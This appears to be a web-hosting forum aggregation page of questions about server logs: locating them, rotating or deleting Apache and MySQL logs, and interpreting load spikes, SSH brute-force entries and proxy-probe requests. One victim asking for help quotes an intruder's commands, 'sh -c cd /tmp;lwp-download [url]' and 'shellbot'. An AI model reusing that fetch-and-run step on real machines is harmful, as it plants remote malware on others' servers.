How Can I Check Logs
Apr 9, 2008How can I check the logs to see if there are any errors? Can I check this via WHM?
View 6 RepliesHow can I check the logs to see if there are any errors? Can I check this via WHM?
View 6 RepliesI have a VPS and almost once per day PIM has to restart the DNS service. I think it is because of the high volume of sites on it.
Could someone point me to which log files I could have a look at and maybe get a clue why it crashes?
I want to check error logs in hypervm in my friend vps , as I haven't done before, I want to know where can I view error logs
I have a doubt if there was an error in installation of kloxo, as I couldn't find an option to add ip address in kloxo or any other error which is troubling in adding an ip to kloxo
what is causing this error,
"Internal Server Error. The server encountered an internal error or misconfiguration and was unable to complete your request."
my server load was above 200+ today on this specific time.
How do I check from logs what is going on? Where do I begin?
16:28:11 up 32 days, 22 min, 2 users, load average: 241.03, 108.69, 54.24
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mi pts/0 xxx.82.73.xxx Thu20 0.00s 0.06s 0.39s sshd: mi [priv]
mi pts/1 xxx.82.73.xxx Thu21 18.00s 1:07m 0.37s sshd: mi [priv]
is it possiable to delete these files in the server access_logs and errors_logs
View 1 Replies View RelatedI would like to know how to check load via ssh and check files causing load?
I want the ssh codes for 2 different set of control panels, one with cpanel+whm and other with kloxo+hypervm
and I would also know how to check the files causing the load, such as some files could have been interrupted while processing, so they could be causing load some times, so I want to stop such processes if any are running on the vps on my friends accounts
The vps has
256MB(512 burstable) of memory
10GB of HardDisk space
Using Lighttpd, PHP and MySQL
ControlPanel is LXAdmin
top - 05:59:24 up 36 min, 1 user, load average: 0.42, 0.60, 0.62
Tasks: 31 total, 1 running, 29 sleeping, 0 stopped, 1 zombie
Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 1048576k total, 55216k used, 993360k free, 0k buffers
Swap: 0k total, 0k used, 0k free, 0k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 15 0 1964 660 568 S 0 0.1 0:00.46 init
3922 root 15 0 7824 2104 1720 S 0 0.2 0:00.01 sshd
9868 root 15 0 2352 1272 1064 S 0 0.1 0:00.00 bash
11693 root 18 0 2104 1020 820 R 0 0.1 0:00.10 top
17861 root 16 0 1632 620 520 S 0 0.1 0:00.00 syslogd
17918 dbus 25 0 2636 468 328 S 0 0.0 0:00.00 dbus-daemon
17955 root 18 0 5116 956 644 S 0 0.1 0:00.00 sshd
18093 tinydns 18 0 1544 304 252 S 0 0.0 0:00.00 tinydns
18106 root 23 0 1596 372 308 S 0 0.0 0:00.00 tcpserver
18131 apache 18 0 8452 4276 812 S 0 0.4 0:02.27 lighttpd
18132 admin 15 0 38704 24m 6652 S 0 2.4 2:58.37 php-cgi
18224 addons 20 0 22024 8456 4572 S 0 0.8 0:00.01 php-cgi
18278 root 15 0 2348 1112 968 S 0 0.1 0:00.00 sh
19519 root 15 0 4032 1432 1172 S 0 0.1 0:00.00 lxadmin.exe
19557 root 17 0 2608 884 712 S 0 0.1 0:00.00 xinetd
19594 lxlabs 18 0 5364 2220 1160 S 0 0.2 0:00.13 lxadmin.httpd
19879 root 18 0 2344 1124 964 S 0 0.1 0:00.00 mysqld_safe
19921 mysql 15 0 13688 5240 3904 S 0 0.5 0:17.51 mysqld
20250 qmails 15 0 1804 476 372 S 0 0.0 0:00.00 qmail-send
20256 qmaill 18 0 1564 472 404 S 0 0.0 0:00.00 splogger
20260 root 22 0 1576 344 268 S 0 0.0 0:00.00 qmail-lspawn
20261 qmailr 15 0 1572 372 296 S 0 0.0 0:00.00 qmail-rspawn
20275 qmailq 18 0 1560 352 284 S 0 0.0 0:00.00 qmail-clean
21824 root 18 0 6200 1296 960 S 0 0.1 0:00.00 authdaemond
21828 root 15 0 1596 376 312 S 0 0.0 0:00.00 tcpserver
21834 root 25 0 1592 368 308 S 0 0.0 0:00.00 tcpserver
21838 root 18 0 6200 460 124 S 0 0.0 0:00.00 authdaemond
21842 root 18 0 1592 372 312 S 0 0.0 0:00.00 tcpserver
21861 root 25 0 1592 368 308 S 0 0.0 0:00.00 tcpserver
21890 root 18 0 3184 1108 576 S 0 0.1 0:00.00 crond
I just got an email from my vps saying that a BFD attack was stopped and the ip was banned after 40 failed attempts of logging into ftpdpro. I logged in and started looking around and I noticed that in my apf log file there was:
Code:
Jan 15 00:54:07 s1 apf(22290): {glob} firewall initalized
Jan 15 00:54:07 s1 apf(22290): {glob} fast load snapshot saved
Jan 15 00:58:06 s1 apf(32425): {glob} uptime less than 5 minutes, going full load
Jan 15 00:58:06 s1 apf(32425): {glob} activating firewall
Jan 15 00:58:06 s1 apf(32500): {glob} unable to load iptables module (ip_tables), aborting.
Jan 15 00:58:06 s1 apf(32425): {glob} firewall initalized
Jan 15 00:58:06 s1 apf(32425): {glob} fast load snapshot saved
Jan 15 01:00:04 s1 apf(3950): {glob} uptime less than 5 minutes, going full load
My concern is that it says "unable to load iptables module (ip_tables), aborting.
is there anything that logs server load and what processes have caused any spikes?
one of my servers keeps going down under high load, well it seems to lock up and the noc has to reboot, but ofcourse the techs can't diagnose a problem after as it runs fine and when i send them a ticket it's because the server can't be reached at all and then they can't diagnose it either
I moved a domain of mine from one of my CentOS servers on my SoHo LAN, to one of my CentOS cPanel/WHM servers. Since the SoHo machine had been handling this domain's mail for almost 2 years (300+ mb of mail), I decided to continue running it from home.
The Apache daemon was stopped on said SoHo box following DNS propagation to the cPanel machine, but Apache was automatically started again after having to reboot the SoHo server. Before I got a chance to kill Apache, I got some weird entries showin' up in the access_logs.
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:30:20 -0700] "CONNECT 205.188.179.233:443 HTTP/1.0" 302 286 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:37:05 -0700] "CONNECT 205.188.176.230:443 HTTP/1.0" 302 286 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:43:30 -0700] "CONNECT 205.188.153.99:443 HTTP/1.0" 302 285 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [16/Apr/2009:00:10:01 -0700] "CONNECT 205.188.153.100:443 HTTP/1.0" 302 286 "-" "-"
I ask simply because I don't recall seeing a "CONNECT" entry in my logs before, and I've been at this for awhile. That or I've just not paid any attention. And what's with the SSL port?
I guess I'm just a little confused as to what was trying to be accomplished here...it hasn't returned since.
Can we delete sql logs ? as it occupies 2.97gb
All the log is under a single file, occupying huge amount of space on our server
use lxadmin for the vps
we are unable to even open up the file, as we have almost run out of space, we would atleast like to delete around old logs older than a month, this logs are from 3 months, so please help us in solving this problem
if we delete the sql log, will a new log be created automatically or it gives an error?
if redhat keeps a log of ip addresses which have logged into the server.
Ive got a machine that one of my staff logged into today with the root account, and im wondering if I can find out the ip address of the user who logged in as root?
I think my apache is killing my servers with crazy overload with logs... how do I turn this off?
View 2 Replies View RelatedI have recently started a forum and am wondering where I should locate the error logs for such things as database backups and failed admin panel login attempts.
There is the public_html folder, but I'm concerned that Anything contained within this folder is accessible to prying eyes. Is this true?
I have also heard of directory traversal, which I imagine could fall under the same category.
Would I perhaps be best off creating a folder outside of public_html for the holding of these valuable 'targets'?
What would I best to do to secure my server in this regard? It would have to be writeable for the system to be operational.
how do we view boot up logs to see what errors you're getting?
View 2 Replies View Relatedwhy this is happening?
Feb 22 04:58:31 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Feb 22 04:58:32 la1092 kernel: ata2: status=0x50 { DriveReady SeekComplete }
Feb 22 04:58:32 la1092 kernel: Info fld=0x2d7e, Current sdb: sense key No Sense
Feb 22 04:58:32 la1092 kernel: ata1: command 0xc8 timeout, stat 0x50 host_stat 0x24
Feb 22 04:58:32 la1092 kernel: ata1: status=0x50 { DriveReady SeekComplete }
Feb 22 04:58:32 la1092 kernel: Info fld=0x4632f99, Current sda: sense key No Sense
Feb 22 04:58:32 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Current setup is nginx, lighttpd and apache as web servers.
I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code:
hubberfix
sh -c cd /tmp;lwp-download [url]
shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
Where are MySQL logs stored on apache?
View 3 Replies View Related- exim_mainlog starts at 03/18/2007 (not aware of any rotating log crons)
- grep info@someexternaldomain.com /var/log/exim_mainlog is empty, even after sending to that email from localdomain.com today, a few times
- localdomain.com is found fine in localdomains, trueuserdomains
- localdomain.com sent just fine to another local domain on server plus gmail account. Delivery receipt to both domains plus the info@someexternaldomain.com were "succesful"
I've received from info@someexternaldomain.com many times back and forth without issues, yet today nothing shows up in exim_mainlog NOR any other logs inside /var/log
My messages logs are full with the following:
Aug 16 05:45:08 sml101 sshd(pam_unix)[23100]: check pass; user unknown
Aug 16 05:45:08 sml101 sshd(pam_unix)[23100]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:13 sml101 sshd(pam_unix)[23119]: check pass; user unknown
Aug 16 05:45:15 sml101 sshd(pam_unix)[23119]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:18 sml101 sshd(pam_unix)[23161]: check pass; user unknown
Aug 16 05:45:18 sml101 sshd(pam_unix)[23161]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:21 sml101 sshd(pam_unix)[23178]: check pass; user unknown
Aug 16 05:45:21 sml101 sshd(pam_unix)[23178]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:24 sml101 sshd(pam_unix)[23187]: check pass; user unknown
Aug 16 05:45:24 sml101 sshd(pam_unix)[23187]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:27 sml101 sshd(pam_unix)[23235]: check pass; user unknown
Aug 16 05:45:27 sml101 sshd(pam_unix)[23235]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:29 sml101 sshd(pam_unix)[23249]: check pass; user unknown
Aug 16 05:45:29 sml101 sshd(pam_unix)[23249]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:32 sml101 sshd(pam_unix)[23262]: check pass; user unknown
Aug 16 05:45:32 sml101 sshd(pam_unix)[23262]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:35 sml101 sshd(pam_unix)[23283]: check pass; user unknown
Aug 16 05:45:35 sml101 sshd(pam_unix)[23283]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:38 sml101 sshd(pam_unix)[23307]: check pass; user unknown
Aug 16 05:45:38 sml101 sshd(pam_unix)[23307]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
Aug 16 05:45:40 sml101 sshd(pam_unix)[23321]: check pass; user unknown
Aug 16 05:45:40 sml101 sshd(pam_unix)[23321]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.111.176.1$
I have Apache making seperate log files for each of my virtual hosts and putting them in /home/vhostname/log. Rotatelogs makes a new log every 24 hours, but the logs quickly add up and since the sites are fairly busy the logs are at times over a gb. Is there any way to make rotatelogs delete the log files after two days? Or should I just use newsyslog?
View 2 Replies View RelatedI just have a quick question for the experts here regarding the bin logs that MySQL generates. I have Googled around, tried to understand these logs, and from what I gather, it is a good idea to leave on if you want to do replication in case something happens, or if you have a slave or backup drive and you want to replicate to it.
So, these things seem like a good thing to have. My question is though, do they HAVE to stay there now? I unknowingly enabled these back in May on my CentOS server when I used and then tweaked the my-huge conf file, and there they are ever since. Currently they're sucking down 30GB of my hard disk and it's only 80GB.
It would be good if I could just take say, all the ones that haven't been modified for at least a month or so (there are 30 of them, most of them are stopped at 1GB I believe, that's how it splits them up.) Is moving those to another hard disk say, my 500GB one, an OK thing to do?
It won't affect my currently running MySQL data, right? And the bin logs will still be useful?
Does this bin log make MySQL slower?
since i take server i got a lot of errors on my apche logs when i post this command on my shell:-
Code:
tail -f /usr/local/apache/logs/error_log
will coming a lot & fast error and not stop until i stop the apache:-
Code:
[Fri May 29 11:37:52 2009] [error] [client 77.167.228.165] File does not exist: /usr/local/apache/htdocs/40E80014354C4C30365047322020202020202020202020206C0000004D6600000001760000005CEB000530E1E8EEF4
[Fri May 29 11:37:52 2009] [error] [client 89.215.36.123] File does not exist: /usr/local/apache/htdocs/40E80014202020202020465032443031324B3842364842456C000000446600000001760000005CEB000530797F848A
[Fri May 29 11:37:52 2009] [error] [client 93.185.179.132] File does not exist: /usr/local/apache/htdocs/40E800006C000001596600000001760000005CEB0005307587A8B4
every thing is ok but i need to remove this error and i can't under stand from where comming ! "/usr/local/apache/htdocs"
as the title states,where do i find my server logs?
i run LAMP and have root access.
and once i find the file,how do i view it through shell?
I'm sure this question has been asked before, but I'm looking for a nice and simply way of breaking up log files into smaller chunks.
I've been running apache2 on a VPS for the past few months and one of the access.log files is now 700mb big... bit of a waste of space. I'm currently just doing:
CustomLog /var/www/logs/domain.com/access.log combined
ErrorLog /var/www/logs/domain.com/error.log
In my apache config.
Is there any easy way of telling apache to just keep the last week or months worth of logs?
I just found hundreds of rubbish urls in awstats for a particular domain. Is this referrer spam or something more serious and can I do something about this?
I have attached a screenshot.
I am an administrator/developer for a website and we are using Awstats to get the usage statistics. Lately we are getting hits from a bunch of IP Addresses which differ only in the Host ID part.
For example:
Here are the logs
Address-------Page Views----------Last visit
64.12.116.209----25------------17 Jun 2008 12:22
64.12.110.94------2------------17 Jun 2008 12:20
64.12.116.142----11------------17 Jun 2008 12:20
64.12.116.135----42------------17 Jun 2008 12:19
64.12.116.130----18------------17 Jun 2008 12:17
64.12.116.80-----11------------17 Jun 2008 12:17
64.12.116.139----15------------17 Jun 2008 12:15
64.12.116.132----16------------17 Jun 2008 12:14
64.12.116.210----33------------17 Jun 2008 12:10
64.12.116.208----21------------17 Jun 2008 12:06
64.12.116.144-----3------------17 Jun 2008 12:04
64.12.117.5------22------------17 Jun 2008 12:20
64.12.117.11-----50------------17 Jun 2008 12:16
64.12.117.8------56------------17 Jun 2008 12:08
64.12.117.207----17------------17 Jun 2008 12:07
..
...
Notice how most of the IP addresses are 64.12.116.xxx or 64.12.117.yyy. Similarly I found addresses matching 65.55.109.zzz and a bunch more.
This is making me wonder if this is some kind of an attack (Especially since Awstats seems to say that the hosts list does not include the IP addresses of spiders/crawlers/bots)? We are concerned. Please advise.
The above Hosts List (sorted by Last Visit) was generated by using Awstats our website logs.
I am just about to launch a new service but needed to know if logs are legally necessary - i.e. is there a law saying if I offer access to a server I am legally required to hold logs of all activity?
The service itself is all above board so there is no question from the business side.
All I will record is a log in name and associated IP to ensure that one account is not being accessed by hundreds of different people!
Thought I would try to get this clear in my head before going ahead and launching!
my host is telling me that since I don't have a domain name setup (I use [url] that my account won't be logging ANYTHING. no raw access logs or anything. Why is this? Isn't there a setting in the vhost file to setup logs without a domain name?
View 6 Replies View RelatedI use linux server with Cpanel control panel.
default default apache logs folder is in /usr/local/apache/logs/error_log
I want to monitor errors . How can I have an error log file for each individual domain?